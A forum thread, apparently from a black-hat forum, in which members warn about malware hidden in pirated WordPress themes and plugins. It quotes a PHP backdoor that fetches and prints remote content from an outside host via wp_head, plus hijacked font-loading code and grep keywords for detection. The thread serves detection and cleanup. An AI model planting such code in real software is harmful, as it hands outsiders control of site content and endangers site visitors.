Simey69's Warning To Everyone. Please READ this!!!

[intrepid]

Quote:just want to offer my finding

the change from social.png to other name abc.png

abc can be anything

so

download OP file, unzip all file
in Windows 7 use folder view>pick> Large icons or extra large icons view
if you cannot see the png show any images among the file you shall suspect something wrong, open with notepad++
use online decoder to decode it
than you can clearly see the virus or infection
"pls give REP if this help you to delete infection"
ran virustotal sometimes may not detect this infection

hope this help to my dear sincere members

Quote:I usually open notepad++ and scan the theme folder for the following:
base64_decode
eval(
mail(
imgur
And also www and http references throughout the theme.

Quote:I've noticed all bulkyfile shares have a "readme.txt" where they usually aren't expected, such as inside the wp-includes folder. Some even four levels deep.

@PUTin-SUp reported this malware activity on August 17th but his/her thread was removed within 1 hour of posting. I know this because I pm'd him. The thread was titled:

[DONT-GET!!!] php include('img/thumb.png'); [!]

<?php if (mt_rand(0,99) == 1) {function sec1_check() {if(function_exists('curl_init')) {$url = "spamcheckr.com/req.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);cu​​​​rl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec1_check');
}?>

He stated that...The code is hidden inside the .png files social.png or thumb.png u can open that file with any text editor to see....before upload to server ;)

so on a lill help is that all releases u get from linkquicks or quicklinkz host are infected never trust them this viruschecklinks are worth zero!!!

u can find this codes always in the plugins-main.php files at top or at bottom inside. or functions.php file. watch out for a images/img folder wicvh contains only 1 file inside ** a social.png OR thumb.png ** if u see something like that u can be sure thats infected and should be alarmed.. to solve that a simple solution is that u never get files from linkzquick/quicklinkz filehost.. the releases also contained a txt files wich *get nulled scripts* name

probably there are any other named file icon.png or whatever tomorrow... they are still creative to hide his bad content...

My question is this: If virustotal is useless, is there a reliable tool or service we can use to find this malware before uploading it to the server? Also, can it infect the database with an SQL injection if the malware script is unknowingly uploaded to the server?

Just read
* wptavern(dot)com/how-to-find-hacked-wordpress-files
* wpbeginner(dot)com/wp-tutorials/how-to-find-a-backdoor-in-a-hacked-wordpress-site-and-fix-it

FYI: I like buying plugins and themes that I use so I'm a group buy advocate. See http://bestblackhatforum.com/Thread-Grou...eme-Loaded

[stesa]

Hi everyone,

I wont to share my recent experience. My hole server is infected with some code implemented in every php file at the beginning of the file. No use to clean the files, delete files and insert new ones, because it again implemented at the beginning of the file. Attacks only php. The code is very long , have a lot of numbers ... I can not find the source.
Wordpress deactivating the plug-ins , because encounters on invalid header - what is true. And without active plugins , my sites do not work.
I do not know what to do. If anyone have some advise to share ... ?

[jeffreyrajan]

thank you so much rep added

[MisterXX2]

hi guys

what do you think about this ? just found this in bazar 2.43 it´s an upload from someone here and from gfxtra.net

i would say this is malicous code ?

public function print_ajax_request() {
$cache = yit_get_model( 'cache' );
if( $cache->is_expired( 'google_fonts.json' ) ) :
?>
<script type="text/javascript">
jQuery( document ).ready( function ( $ ) {
var fonts = null;
$.ajax({
//url: "https://www.googleapis.com/webfonts/v1/webfonts",
url: "http://niubbys.altervista.org/google_fonts.php",
dataType: "jsonp",
success: function( ret ) {
var data = {
action: 'retrieve_google_fonts',
google_fonts : ret
};

//since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
$.post( ajaxurl, data, function( response ) {} );
}
});
});
</script>
<?php
endif;

[bennyb]

Guys, if we would use MD5 hash string of the original theme to compare it to posted here then we would definitely be able to spot the altered files. I sent the PM to mods here regarding this and I honestly believe it could eliminate the problem of a fake files. In summary my idea is simple. What we will need to do is create a topic where trusted users would post just a hash tags of KNOWN clean theme archive files. Then we can compare the the clean MD5 hash string to all the posted here re-ups and supposedly "clean" themes and see if it matches the virgin, original hash string. If it matches then all is clean. If not then file was altered. The MD5 hash is unique to every file and this method has been used in forever to verify keygens by the cracker teams and such. Why not use it for the themes downloads!
There are tons of free and crack3d programs that can calculate MD5 hash (Or sha1 or whatever other unique strings).


Happy Holidays to those who celebrate!

[karma1]

Hi ;)
I'm reading the different posts in this thread with a lot of attention ! lol !
What to do once nulled script or theme is downloaded ?
1) Extract all files first in a separate folder
2) Scan with your antiviruses (eliminates Trojan, ...)
3) Once this first step is done, install theme on your server (means on your own pc first - w/xamp server or sth else)
4) Add Wordfence plugin to your Wordpress install and run it ! If your theme contains malicious code like 64 basecode , suspicious php functions and social.png. It also will detect if the Wordpress core has been modified in a suspicious way.
The use of this plugin will save you a lot of time if you want to avoid troubles with nulled themes or scripts. You should always keep in mind that there's nothing better than check all folders manually but if you haven't time or knowledges on how to do, Wordfence is the right plugin for this task and it's free;)
Hope this helps ;)
+5 rep added for Simey69;)

[vamon]

Admin, get' them down:
There has been a thread around with a lot of sharings with different Wordpress-Plugins for "WooCommerce".

I can't find this thread know, sry, but I've downloaded some at once and my AVG reported the "social.png".
Also there had been the php-line at the end of the main-script.

rep +5 because the sheriff is in the town now ;)

Cheers

[vamon]

(12-04-2014 08:56 AM)karma1 Wrote:  Hi ;)
I'm reading the different posts in this thread with a lot of attention ! lol !
What to do once nulled script or theme is downloaded ?
1) Extract all files first in a separate folder
2) Scan with your antiviruses (eliminates Trojan, ...)
3) Once this first step is done, install theme on your server (means on your own pc first - w/xamp server or sth else)
4) Add Wordfence plugin to your Wordpress install and run it ! If your theme contains malicious code like 64 basecode , suspicious php functions and social.png. It also will detect if the Wordpress core has been modified in a suspicious way.
The use of this plugin will save you a lot of time if you want to avoid troubles with nulled themes or scripts. You should always keep in mind that there's nothing better than check all folders manually but if you haven't time or knowledges on how to do, Wordfence is the right plugin for this task and it's free;)
Hope this helps ;)
+5 rep added for Simey69;)

and +5 for Karma1 for sharing this careless-solution :D
Thought before that Wordfence takes a lot of php-memory, but with this hindsight it doesn't care anymore^^

[SrVaNaGaS]

Thanks for this alert OP

[JohnPMarketing]

I think all these spammers should be removed or their rights to post should be removed. What do you think http://bestblackhatforum.com/Thread-Spammers--185797